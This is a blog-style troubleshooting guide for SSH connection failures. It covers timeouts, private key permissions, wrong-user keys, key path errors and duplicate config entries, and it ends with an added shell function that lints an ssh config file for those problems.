The hard part about ssh isn’t the setup; it’s the troubleshooting. There are a lot of little details, and if any one is wrong, BOOM!, it doesn’t work.
This post references material from an earlier post – ssh – The Important Stuff
-vvv
The most important part of troubleshooting is using the very verbose flag (-vvv), which gives you more information about what ssh is doing in the background.
>> ssh acc63 -vvv
#Outputs a ton of information to help you troubleshoot
Network Errors
Timeouts
A common issue with connections is timeouts.
>> ssh 10.9.8.7
ssh: connect to host 10.9.8.7 port 22: Operation timed out
Timeouts can be caused by many things, but here are some common reasons:
- The url/ip doesn’t exist
  - Solution: Double-check that the url/ip is correct
- Firewall or security block
  - The ip/url may be correct, but you are being blocked by a firewall. If you are using AWS, a security group rule can be denying access.
  - Solution: Work with network administrators to determine the best way to access the server. This may involve using a VPN, a jump/bastion host, or updating the firewall rules.
Key Errors
Permissions
The permissions on a private key file need to be:
- owner: R/W
- group: None
- Public: None
If the permission is not set correctly you will see the following:
>> ssh acc63
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for '/Users/<user>/.ssh/id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "/Users/<user>/.ssh/id_rsa": bad permissions
To fix it, correct the permissions:
>> chmod 600 ~/.ssh/id_rsa
>> ssh acc63 # works correctly
Right Key Wrong User
When a key is added to a user’s authorized_keys file, it is on a per-user basis.
So if you log in as user1 but the key is put in /home/user2/.ssh/authorized_keys, then the connection will fail.
>> ssh acc63
ubuntu@10.9.8.7: Permission denied (publickey).
Keyfile Content Issues
Whenever you are copying and pasting keys, it’s easy to leave off a character at the front or back of the key.
If you get key permission errors:
>> ssh acc63
ubuntu@10.9.8.7: Permission denied (publickey).
Check that both the private key and the copy of the public key on the final server are correct and not missing any characters.
Keyfile Path Issues
The path to your keyfile needs to be correct in your ssh config. If it is incorrect, you will not be able to connect.
>> ssh acc63
no such identity: /Users/user/.ssh/id_rsa222: No such file or directory
ubuntu@10.9.8.7:: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).
SSH Config Errors
Duplicate Entry Errors
ssh will use the first matching Host in the ssh config file. So if you have 2 entries with the same name, you may not get the results you want.
# Sample ssh_config
# <=== Uses this one
Host acc63
    HostName 10.40.12.113
    User ubuntu
    IdentityFile ~/.ssh/id_rsa
# <=== NOT this one
Host acc63
    HostName 10.40.12.113
    User ubuntu
    IdentityFile ~/.ssh/id_rsa
If you spend time updating the config and it seems like your changes aren’t getting applied, this may be the reason.
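As an added example (not code from the original post), the shell function below checks an ssh config for three of the problems covered above: duplicate Host entries, IdentityFile paths that do not exist, and key files accessible by group or others. It assumes simple "Keyword argument" lines and ignores Include, Match and quoting; the function name ssh_config_lint and the sample files are constructed for illustration.

```shell
#!/bin/sh
# Added example: lint an ssh client config for three problems from this post.
# Assumes plain "Keyword argument" lines; Include, Match and quoting are ignored.
ssh_config_lint() (
  cfg="${1:-$HOME/.ssh/config}"; seen=" "; n=0
  while IFS= read -r line || [ -n "$line" ]; do
    n=$((n + 1))
    line="${line%%#*}"                      # strip comments
    set -f; set -- $line; set +f            # split on whitespace, no globbing
    [ $# -ge 2 ] || continue
    kw=$(printf '%s' "$1" | tr '[:upper:]' '[:lower:]'); shift
    case "$kw" in
      host)                                 # ssh keeps the first value it finds
        for h in "$@"; do
          case "$seen" in
            *" $h "*) echo "line $n: duplicate Host $h (the earlier entry wins)" ;;
            *) seen="$seen$h " ;;
          esac
        done ;;
      identityfile)
        p="$1"
        case "$p" in "~/"*) p="$HOME/${p#"~/"}" ;; esac
        if [ ! -f "$p" ]; then
          echo "line $n: IdentityFile $p does not exist"
        elif [ "$(ls -ld "$p" | cut -c5-10)" != "------" ]; then
          echo "line $n: IdentityFile $p is open to group/others (chmod 600)"
        fi ;;
    esac
  done < "$cfg"
)

# Constructed sample: a duplicate Host, a 0644 key and a misspelled key path.
demo=$(mktemp -d)
printf 'not a real key\n' > "$demo/id_rsa"; chmod 644 "$demo/id_rsa"
cat > "$demo/config" <<EOF
Host acc63
  HostName 10.40.12.113
  IdentityFile $demo/id_rsa
Host acc63
  HostName 10.40.12.113
  IdentityFile $demo/id_rsa222
EOF
ssh_config_lint "$demo/config"
```

Run the function with no argument to check ~/.ssh/config. To see which values ssh actually resolves for a host after reading the config, `ssh -G acc63` prints the effective options without connecting.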